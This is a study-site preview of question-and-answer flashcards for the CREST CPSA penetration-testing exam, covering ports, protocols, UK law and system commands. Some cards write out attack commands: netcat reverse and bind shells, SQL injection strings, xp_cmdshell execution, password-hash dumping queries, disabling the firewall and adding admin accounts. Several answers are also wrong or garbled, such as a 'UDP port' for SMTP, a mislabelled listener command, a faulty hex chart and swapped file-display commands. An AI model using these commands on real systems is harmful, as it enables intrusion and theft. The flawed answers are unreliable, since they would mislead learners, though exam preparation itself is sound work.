Docsity
Docsity

Prepare for your exams
Prepare for your exams

Study with the several resources on Docsity


Earn points to download
Earn points to download

Earn points by helping other students or get them with a premium plan


Guidelines and tips
Guidelines and tips

CREST CPSA New Practice Exam With Accurate Solutions 100% Verified Latest Update, Exams of Information Technology

CREST CPSA New Practice Exam With Accurate Solutions 100% Verified Latest Update

Typology: Exams

2024/2025

Available from 12/02/2024

Smartsolutions
Smartsolutions 🇺🇸

2.6K documents

1 / 39

Toggle sidebar

Related documents


Partial preview of the text

Download CREST CPSA New Practice Exam With Accurate Solutions 100% Verified Latest Update and more Exams Information Technology in PDF only on Docsity!

CREST CPSA New Practice Exam With Accurate Solutions 100% Verified Latest Update

iptables - ANSWER A user-space utility program that allows a system administrator toconfigure the tables provided by the Linux kernel firewall and the chains and rules it stores. Squid Proxy - ANSWER 3128 Wireshark and TCPdump - ANSWER Common packet analyzers. Allows the user todisplay TCP/IP and other packets being transmitted or received over a network to which the computer is attached. pfSense - ANSWER Open source firewall/router computer software distribution basedon FreeBSD.

Benefits of a Penetration Test - ANSWER - Improvement of the management system

  • Avoiding fines- Protection against financial loss
  • Customer protection Structure of a Penetration Test - ANSWER Planning and Preparation Reconnaissance DiscoveryInformation and Risk Analysis Active Intrusion Attempts Final Analysis ReportPreparation

Another Structure of a Penetration Test - ANSWER Reconnaissance

Vulnerability Scanning Investigation Exploitation Infrastructure Testing - ANSWER Includes all internal computer systems, associatedexternal devices, internet networking, cloud and virtualization testing.

Types of Infrastructure Testing ANSWER External Infrastructure Penetration TestingInternal Infrastructure Penetration Testing Cloud and Virtualization Penetration Testing Wireless Security Penetration Testing External Infrastructure Testing ANSWER Mapping flaws in the external infrastructure Benefits of External Infrastructure Testing ANSWER Identifies flaws within the firewallconfiguration that could be misused. Finds how information could be leaked out from the systemSuggests how these issues could be fixed Prepares an extensive report on the security risk of the networks and suggestssolutions for the same. Ensures overall efficiency and productivity of your business.

Benefits of Internal Infrastructure Testing - ANSWER - Finds out how even a smallsecurity weakness can be used by an internal attacker to his advantage Finds out the potential business risk and damage that an internal attacker can cause toyour business Enhances internal infrastructure security systems Prepares an inclusive report giving details of the security exposures of internalnetworks along with the detailed action plan on how to deal with it

Benefits of Cloud and Virtualization Penetration Testing - ANSWER - Discover the realrisks within the virtual environment and suggests the methods and costs to fix the threats and flaws- Provides guidelines and an action plan how to resolve the issues

  • Improves the overall protection systems- Prepares a comprehensive security system report of the cloud computing and virtualization, outline the security flaws, causes and possible solutions Benefits of Wireless Security Penetration Testing - ANSWER - To find the potential riskcaused by your wireless device
  • To provide guidelines and an action plan on how to protect from the external threats- To create a detailed security system report of the wireless networking, to describe the security weakness, reasons, and potential solutions Black Box Testing - ANSWER Black-box testing is a method in which the tester is givenno information about the application being tested.

Advantages of Black Box Testing - ANSWER - Test is generally conducted with theperspective of a user, not the designer

  • Checks contradictions in the real system and specifications Disadvantages of Black Box Penetration Testing - ANSWER - Specifically these types oftest case are challenging to design
  • Probably, it is not worth, in case designer has already conducted a test case
  • It doesn't do everything White Box Penetration Testing - ANSWER A tester is provided a whole range ofinformation about the systems and/or network such as schema, source code, os details, ip address, etc. Advantages of White Box Penetration Testing - ANSWER - It ensures that all independent

paths of a module have been exercised

  • It ensures that all logical decisions have been verified along with their true and falsevalue.
  • It locates the typographical errors and does syntax checking
  • It locates the design errors that may have occurred because of the difference betweenlogical flow of the program and the actual execution.

Computer Misuse Act 1990 Highlights - ANSWER Section 1: Unauthorized access tocomputer material Section 2: Unauthorized access with intent to commit or facilitate commission of furtheroffenses Section 3: Unauthorized acts with intent to impair, or with recklessness as to impairingthe operation of a computer

Human Rights Act 1998 Highlights - ANSWER - The right to life

  • The right to respect for private and family life
  • The right to freedom of religion and belief- Your right not to be mistreated or wrongly punished by the state

Consent Information for Penetration Test - ANSWER - Contact Name & Title of persongiving consent

  • Testing window-Date range and hours of testing allowed- Names & Contact details of technical team that can assist if needed during test
  • IP addresses or URL to be included in test
  • Any exclusions to specific hosts, services, or areas to be tested within applicationsAuthentication credentials that are considered needed for the purpose of a penetration test in a private application Data Protection Act 1998 Highlights - ANSWER - Personal data shall be processed fairlyand lawfully
  • be obtained only for lawful purposes and not processed in any manner incompatiblewith those purposes
  • be adequate, relevant and not excessive- be accurate and current
  • not be retained for longer than necessary
  • be processed in accordance with the rights and freedoms of data subjects- Be protected against unauthorized or unlawful processing and against accidental loss, destruction or damage Police and Justice Act 2006 Highlights - ANSWER - Make amendments to the computermisuse act 1990 -increased penalties of computer misuse act (makes unauthorized computer accessserious enough to fall under extradition)
  • Made it illegal to perform DOS attacks- It made illegal the supply and ownership of hacking tools.
  • Be cagey when releasing information about exploits. Issues Between Tester and Client - ANSWER - The tester is unknown to his client - so, onwhat grounds he should be given access of sensitive data
  • who will take the guarantee of security of lost data?- The client may blame for the loss of data or confidentiality to tester.

Legal Penetration Testing - ANSWER - A statement of intent to be duly signed by bothparties

  • The tester has the permission in writing with clearly defined parameters- the company has the details of its pen tester and an assurance that he would not leak any confidential data Scoping a CBT - ANSWER - All relevant risk owners
  • Technical staff knowledgeable about the target system
  • The penetration test team should identify what testing they believe will give a fullpicture of the vulnerability status of the estate
  • A representative of the penetration test team- Risk owners should outline any areas of special concern IP - ANSWER The IP (Internet Protocol) is the network layer communications protocol inthe Internet protocol suite used for relaying datagrams across network boundaries.

TCP - ANSWER TCP stands for Transmission Control Protocol. It is a main protocol fromthe Internet protocol suite.

Task of TCP - ANSWER To establish a connection between the client and the serverbefore data can be sent.

User Datagram Protocol - ANSWER Applications that do not require a reliable datastream use User Datagram Protocol.

Responsibility of Internet Protocol - ANSWER Delivering packets from the source host tothe destination host with their IP addresses in the packet header.

UDP- ANSWER Yes, UDP is in the Internet protocol suite. SYN in TCP Handshake - ANSWER The use of SYN is to initiate and establish aconnection. It also helps you to synchronize sequence numbers between devices.

UDP handshakes - ANSWER No, UDP does not perform handshakes. ACK in TCP handshaking - ANSWER Helps to confirm to the other side that it hasreceived the SYN.

SYN-ACK in TCP handshaking - ANSWER SYN-ACK is a SYN message from the localdevice and ACK of the earlier packet.

FIN - ANSWER Used to terminate the connection. Three way handshake - ANSWER TCP is known for performing a three way handshake. SYN - ANSWER SYN means Synchronize. SYN-ACK phrase - ANSWER SYN-ACK is the third phase after the SYN and ACK phrasesof a TCP handshake.

ACK - ANSWER ACK means Acknowledgement. SYN-ACK - ANSWER SYN-ACK means Synchronize Acknowledgement. FIN in TCP - ANSWER FIN means Finish. Port 9100 - ANSWER Jetdirect. Port 567 - ANSWER DHCPv6 (servers). Port 593 - ANSWER RPC over HTTPS. Port 49 - ANSWER TACACS. TACACS - Terminal Access Control of Authentication and Control Systems. Port 514 - Syslog.

Port 520 - RIP. Port 123 - NTP. Port 500 - Internet Security Association and Key Management Protocol - Key exchange. Port 587 - SMTP. UDP port for SMTP - 587. Port 1521 - Oracle. Port 6000 - X11. Port 21 - FTP. Port 389 - LDAP. Port 67 - DHCP server. Port 23 - ANSWER Telnet. Port 546 - ANSWER DHCPv6 (client). Port 445 - ANSWER SMB.

Port 161 - ANSWER SNMP. Port 143 - ANSWER IMAP. Port 1194 - ANSWER VPN. Port 1434 - ANSWER MS-SQL (monitoring). Port 636 - ANSWER LDAPS. Port 3306 - ANSWER MYSQL. Port 69 - ANSWER TFTP. Port 25 - ANSWER SMTP. Port 53 - ANSWER DNS. Port 80 - ANSWER HTTP. Port 139 - ANSWER NETBIOS (session services). Port 1433 - ANSWER MS-SQL. Port 2049 - ANSWER NFS, or Network File System. Port 5060 - ANSWER, this is the Session Initiation Protocol for unecrypted signalling,

utilizing TCP/UDP. Port 3389 - ANSWER RDP or Remote Desktop Protocol. Port 5222 - ANSWER, this is used for Jabber. Port 179 - ANSWER, the Border Gateway protocol. Port 902 - ANSWER, VMWARE. Port 1080 - ANSWER, this is the SOCKS Proxy. Dameware - ANSWER, 6129 and 1629. Port 6667 - ANSWER, this is IRC. Port 9001 - ANSWER, Tor, HSQL. Port 9090 - ANSWER, Openfire. Port 5666 - ANSWER, Nagios. Port 5432 - ANSWER Postgres. Service on port 201 - ANSWER AppleTalk. Nagios - ANSWER An open source system monitoring service.

Postgres - ANSWER An object relational database management system. X11 - ANSWER A windowing display system for bitmap displays, common on unix-likeoperating systems.

CDP - ANSWER Cisco Discovery Protocol. Function of CDP - ANSWER It's a network discovery tool, allows admins to identifyneighboring Cisco devices.

CDP default setting - ANSWER Yes, CDP is enabled by default. DTP - ANSWER Dynamic Trunking Protocol. HSRP - ANSWER Hot Standby Router Protocol. VTP - ANSWER Protocol that propagates the definition of VLANs on the whole local areanetwork.

Hot Standby Router Protocol - ANSWER A network protocol that provides redundancyfor routers.

Symmetric Encryption - ANSWER Only one key is used to both encrypt and decryptelectronic information.

Asymmetric Encryption - ANSWER There is a public key to encrypt and a private key todecrypt.

Block Algorithm - ANSWER An algorithm that encrypts information in blocks. Yersinia - ANSWER A Layer 2 Testing Tool. OSI Layer 7 - ANSWER Application Layer. OSI Layer 5 - ANSWER Session Layer. OSI Layer 3 - ANSWER Network Layer. OSI Layer 1 - ANSWER Physical Layer. OSI Layer 2 - ANSWER Data Link Layer. OSI Layer 4 - ANSWER Transport Layer. OSI Layer 6 - ANSWER Presentation Layer. CDP Advantages - ANSWER Finds out about neighbouring devices and theirconfiguration, can discover routers or switches that are incorrectly configured, helps in troubleshooting. Layer 4 Function - ANSWER Send data across using the TCP and UDP protocols. Layer 7 Function - ANSWER Applications have access to the network services. Layer 1 Function - ANSWER Transmits raw bitstream across the physical medium.

Layer 6 Function - ANSWER Ensures that data is in a usable format and is where dataencryption occurs.

Layer 5 Function - ANSWER Maintains connections and is responsible for controllingports and sessions.

Layer 2 Function - ANSWER Defines the format of data on the network. Layer 3 Function - ANSWER Decides which physical path the data will take. TCP Port 1 - ANSWER TCP Port Service Multiplexer (TCPMUX). TCP Port 5 - ANSWER Remote Job Entry (RJE). TCP Port 7 - ANSWER ECHO or ICMP. TCP Port 18 - ANSWER Message Send Protocol (MSP). TCP Port 29 - ANSWER MSG ICP. TCP Port 37 - ANSWER Time Protocol. TCP Port 42 - ANSWER Host Name Server (Nameserv). TCP Port 43 - ANSWER WHOIS. TCP Port 70 - ANSWER Gopher Services.

TCP Port 79 - ANSWER Finger. TCP Port 103 - ANSWER X.400 Standard. TCP Port 159 - ANSWER SQL Server. TCP Port 190 - ANSWER Gateway Access Control Protocol (GACP). TCP Port 118 - ANSWER SQL Services. TCP Port 197 - ANSWER Directory Location Service (DLS). TCP Port 398 - ANSWER Novell Netware over IP. TCP Port 119 - ANSWER NNTP (Network News Transfer Protocol) Newsgroup. TCP Port 444 - ANSWER Simple Network Paging Protocol (SNPP). TCP Port 453 - ANSWER Apple Quicktime. TCP Port 500 - ANSWER IKE Internet Key Exchange. TCP/IP Model Mnemonic - ANSWER Never Ingest Turian Almonds. CAT5 - ANSWER CAT5 category 5 cable is a twisted pair cable for computer networking. 10/100/1000baseT - ANSWER An Ethernet standard so developed by the Institute of

Electrical and Electronics Engineers (IEEE). Token Ring - ANSWER A data link for a local area network (LAN) in which all stations areconnected in a ring or star topology.

Wireless (802.11) - ANSWER The IEEE 802.11 is a standard employed for wirelessEthernet networks.

LM Hash - ANSWER Primary Windows LAN hash prior to Windows NT with 14 characterlimit.

DES Encryption - ANSWER A 64 bit block cipher that has five modes of operation,repeated 16 times for each encryption/decryption operation.

3DES Encryption - ANSWER 168 bit key encryption (48 cycles). TTL for Windows - ANSWER 128. TTL for Linux - ANSWER 64. TTL (Time to Live) - ANSWER Indicates the maximum time that an IPv4 packet can resideon the network before being discarded.

Cisco Password Encryption - ANSWER Various including secret 4: Crappy SHA256,secret 5: Salted MD5.

SIP Requests - ANSWER INVITE, ACK, BYE, CANCEL, OPTIONS, REGISTER, PRACK,SUBSCRIBE, NOTIFY, PUBLISH, INFO, REFER, MESSAGE, UPDATE.

SMTP Requests - ANSWER MAIL, RCPT, DATA.

SNMP Requests - ANSWER Get, GetNext, Set, GetBulk, Response, Trap, Inform. HTTP Status Codes - ANSWER 1xx - Info, 2xx - Success, 3xx - Redirection, 4xx - Error,5xx - Server Error.

HTTP Status Code 404 - ANSWER NOT FOUND the method is not available. HTTP Status Code 302 - ANSWER Temporarily Moved. HTTP Status Code 301 - ANSWER Moved Permanently. HTTP Status Code 410 - ANSWER Gone. SQL Injection (Escape Characters) - ANSWER ' OR '1' = '1' --. SQL Injections (Type Handling) - ANSWER 1; DROP TABLE users. Linux File Permissions - ANSWER drwxrwxrwx 2 user(owner) group size date filename. Linux Command: Change Password - ANSWER passwd . Linux Command: Find Files of Type - ANSWER find. -typef -iname '.pdf' - ANSWER Finds files of type PDF. locate '.pdf' - ANSWER Locates PDF files in the system.

/bin - ANSWER User Binaries /boot - ANSWER Bootup related files /dev - ANSWER Interface for system devices /etc - ANSWER System Config Files /home - ANSWER Base directory for user files /lib - ANSWER Critical software libraries /opt - ANSWER Third party software /proc - ANSWER System and running processes /root - ANSWER Home for root /sbin - ANSWER Sys Admin binaries /tmp - ANSWER Temporary Files /usr - ANSWER Less critical files /var - ANSWER Variable system files prstat -a - ANSWER Solaris Command: Process Listing.

svcs -a - ANSWER Solaris Command: Services and Status. svcadm start - ANSWER Solaris Command: Start Service (Admin). Windows NT 5.0 versions - ANSWER Windows 2000 (all). Windows NT 5.1 Versions - ANSWER Windows XP (Home, pro, MC, Tablet, PC, Starter,Embedded).

Windows NT 5.2 Versions - ANSWER Windows XP (64 bit, Pro 64 bit), Windows Server2003 and R2, Windows Home Server.

Windows NT 6.0 Versions - ANSWER Windows Vista (ALL), Windows Server 2008(Foundation, Standard, Enterprise).

Windows NT 6.1 Versions - ANSWER Windows 7 (ALL), Windows Server 2008 R2 (ALL). Windows NT 6.2 Versions - ANSWER Windows 8, Windows Phone 8, Windows Server2012.

Windows NT 10 versions - ANSWER Windows 10, Windows Server 2016, WindowsServer 2019, Windows Server 2022, Windows 11.

%SYSTEMDRIVE%\boot.ini - ANSWER Contains the boot options for computers withBIOS firmware running NT-based operating system prior to Windows Vista.

%SYSTEMROOT%\repair\SAM - ANSWER Stores Windows users' passwords in ahashed format, in LM hash and NTLM hash. These are backups of C:\windows\system32\config\SAM.

Windows Commands: System Info - ANSWER ver : OSVersion, sc query state=all :Services, tasklist /svc : Processes and Services, echo %USERNAME% : Current user.

Windows Command: Find Files of Type - ANSWER dir /a /s /n c:\*.pdf. Windows Commands: Add User, Make Admin - ANSWER net user /add,net localgroup "Administrators" /add.

Linux Command: Add User, Make Sudoer - ANSWER useradd (adduser ),passwd , sudo useradd , sudo (sudo adduser sudo).

Command: View Network Info - ANSWER Linux: ifconfig, Windows: ipconfig /all. Command: Display File Contents - ANSWER Linux: , Windows: cat . nslookup - A command-line utility used in network administration to query the DNS todetermine a domain name or IP address mapping or any other specific DNS record.

IIS 1 Defaults - ANSWER Windows NT Addon. IIS 4 Defaults - ANSWER NT4 Option Pack. IIS 5 Defaults - ANSWER Windows 2000. IIS 2 Defaults - ANSWER NT 4.0. IIS 5.1 Defaults - ANSWER Windows XP.

IIS 3 Defaults - ANSWER NT 4 Service Pack. IIS 6 Defaults - ANSWER Windows Server 2003, Windows XP Pro. IIS 7 Defaults - ANSWER Windows Vista, Server 2008. IIS 7.5 Defaults - ANSWER Windows 7, 2008 R2. IIS 8 Defaults - ANSWER Windows Server 2012, Windows 8. IIS 8.5 Defaults - ANSWER Windows Server 2012 R2, Windows 8.1. IIS 10 v 1607 Defaults - ANSWER Windows Server 2016, Windows 10 AnniversaryUpdate.

IIS 10 v 1709 Defaults - ANSWER Windows 10 Fall Creators, v1709. IIS 10 v 1809 Defaults - ANSWER Windows Server 2019, Windows 10 October Update. Windows Command: Disable Firewall - ANSWER netsh advfirewall set currentprofilestate off, netsh advfirewall set allprofiles state off.

Sysinternals Suite - ANSWER A suite of very powerful Windows administrationapplications to view, troubleshoot and edit Windows functions.

WMCI - ANSWER Windows Management Instrumentation Command-Line. WMCI Command: Execute Process - ANSWER wmci process call create"process_name".

WMCI Command: Uninstall Software - ANSWER wmci product where name="XX" calluninstall /nointeractive.

PCI Card Info Storage Common-Use - ANSWER - Store card details (i.e CC number,expiry) in encrypted form, - Store cardholder details (name, address, contact details.i.e PII) in a SEPARATE encrypted database with a unique reference identifier linking thetwo, - DO NOT STORE sensitive data (i.e CVV2, CVV or CID values).

Windows: Active Directory Default Location - ANSWER C:\Windows\NTDS. Windows: Domain Common Folders - ANSWER C:\Windows\SYSVOL. dsquery - ANSWER Remote Server Administration Tools (RSAT) feature pack tool usedto enumerate Windows Domain.

Classful IP Range: Class A - ANSWER 128 Networks (2^7), 16,777,216 Addresses pernetwork (2^24).

Classful IP Range: Class B - ANSWER 16,384 Networks (2^14), 65,536 Addresses pernetwork (2^16).

Classful IP Range: Class C - ANSWER 2,097,152 Networks (2^21), 256 Addresses pernetwork (2^8).

Classful IP Range Calculation - ANSWER If first bit is "0", it's a class A address. Ifsecond bit is a "0", its class B address. If third bit is a "0", its class C address. If the fourth bit is "0", it's class D address. If its "1", then it's class E address. Classless Subnets / CIDR - ANSWER Class C - 255.255.255.0, /24 (254 Hosts), Class B -255.255.0.0, /16 (65,534 Hosts), Class A - 255.0.0.0, /8 (16,777,214 Hosts).

Hexadecimal Chart - ANSWER 0, 1, 2, 3, 4, 5, 5, 6, 7, 8, 9, 10 - A, 11 - B, 12 - C, 13 - D, 14 -E, 15 - F.

VLAN - ANSWER A logically segmented switched network, segmented by function,project team, or application, without regard to the physical locations of the users.

VLAN IDs 1002-1005 - ANSWER Token Ring and FDDI VLANs VLAN IDs greater than 1005 - ANSWER Extended-range VLANs (not stored in the VLANdatabase)

VLAN IDs 1-1005 - ANSWER Normal-range VLANs vlan.dat - ANSWER Configurations for VLAN IDs 1-1005 GLBA - ANSWER Gramm-Leach-Bliley Act. Gramm-Leach-Bliley Act of 1999 - ANSWER Require financial institutions to protectcustomer data in order to safeguard the security and confidentiality.

GDPR - ANSWER General Data Protection Regulation. FERPA - ANSWER Family Educational Rights and Privacy Act. PCI DSS - ANSWER Payment Card Industry Data Security Standard. Basel Accord - ANSWER An agreement that required banks to hold as capital at least 8%of their risk-weighted assets.

ISO 27000 Series - ANSWER A series containing a range of individual standards anddocuments specifically reserved by ISO for information security.

COBIT - ANSWER Control Objectives for Information and Related Technology. IPv4 - ANSWER The Internet Protocol version 4 is the dominant protocol for routingtraffic on the Internet, specifying 'to' and 'from' addresses using a dotted decimal such as '122.45.255.0'. Cat 5 - ANSWER Category 5 wire, a TIA/EIA standard for UTP wiring that can operate atup to 100 Mbps.

TTL - ANSWER Time to Live. CSMA/CA - ANSWER Carrier Sense Multiple Access with Collision Avoidance. CDMA - ANSWER Code Division Multiple Access (GSM competitor).

Netcat: Start Listener to Catch Shell - ANSWER Linux: nc 10.0.0.1 1234 -e /bin/sh;Windows: nc 10.0.0.1 1234 -e cmd.exe (-e is execute and is not always supported)

Netcat: Listen - ANSWER nc -nlvp Netcat: Transfer Text or Binary Files - ANSWER Listener: nc -nlvp 4444 > incoming.exe;Sender: nc -nv IP to send to 4444 < file

Netcat: Bind Shell - ANSWER Listener: nc -nlvp 4444 -e cmd.exe; Sender/ 'Talker': nc -nvIP to connect to 4444

Netcat: Reverse Shell - ANSWER Listener: nc -nlvp 4444; Sender: nc -nv IP to send to4444 /bin/bash (sends shell!)

NMap: Scan Types - ANSWER -sP : ping scan; -sS : syn scan ('half open' scan); -sT :connect scan (full TCP); -sU : UDP scan; -sO : protocol scan

Port Count 65,536 - ANSWER 2^16 Ports; Applies to TCP AND UDP NMap: Scan EVERY Port - ANSWER TCP: nmap -p- ; UDP: nmap -sU -p- NMap: Common Options - ANSWER -p1-65535 : Ports; -T[0-5] : 'Scan Speed', can helphide you; -n : No DNS Resolution; -O : OS Detection; -A : AGGRESSIVE; -sV : Version Detection; -PN : No Ping; -6 : IPv6 Scan; -oA : Output ALL types NMap: DNS Reverse Lookup - ANSWER nmap -R -sL -dns-server Hash Lengths - ANSWER MD5 : 16 Bytes; SHA-1 : 20 bytes; SHA-256 : 32 Bytes; SHA-512: 64 Bytes

IIS - ANSWER Microsoft Web Server Apache / Tomcat - ANSWER Apache Web Servers GWS - ANSWER Google Web Server WebSphere - ANSWER IBM Web Server MS-SQL: DB Version - ANSWER SELECT @@version; EXEC xp_msver (detailed version

info) MS-SQL: Run OS Command - ANSWER EXEC master.xp_cmdshell 'net user' MS-SQL: SELECT commands - ANSWER SELECT HOST_NAME( ) : Hostname and IP;SELECT DB_NAME ( ) : Current DB; SELECT name FROM master.sysdatabases; : List DBs; SELECT user_name ( ) : Current user; SELECT name FROM master.syslogins : Listusers; SELECT name FROM master.sysobjects WHERE xtype='U'; : List Tables; SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHEREname='mytable'); : List columns

MS-SQL: List all Tables and Columns - ANSWER SELECT name FROM syscolumnsWHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')

MS-SQL: System Table (Info on All Tables) - ANSWER SELECT TOP 1 TABLE_NAMEFROM INFORMATION_SCHEMA.TABLES

MS-SQL 2005 Vulnerability (Password Hashes) - ANSWER SELECT name,password_hash FROM master.sys.sql_logins

Postgres: SELECT statements - ANSWER SELECT version(); : DB Version; SELECTinet_server_addr(); : Hostname and IP; SELECT current_database(); : Current DB; SELECT datname FROM pg_database; : List DBs; SELECT user; : Current user; SELECTusername FROM pg_user; : List Users; SELECT username,passwd FROM pg_shadow : List password hashes MySQL Default Credentials - ANSWER root | MYSQL MySQL: SELECT Commands - ANSWER SELECT @@version; : DB Version; SELECT@@hostname; : Hostname and IP; SELECT database(); : Current DB; SELECT distinct (db) FROM mysql.db; : List DBs; SELECT user(); : Current user; SELECT user FROMmysql.user; : List Users; SELECT host,user,password FROM mysql.user; : List password hashes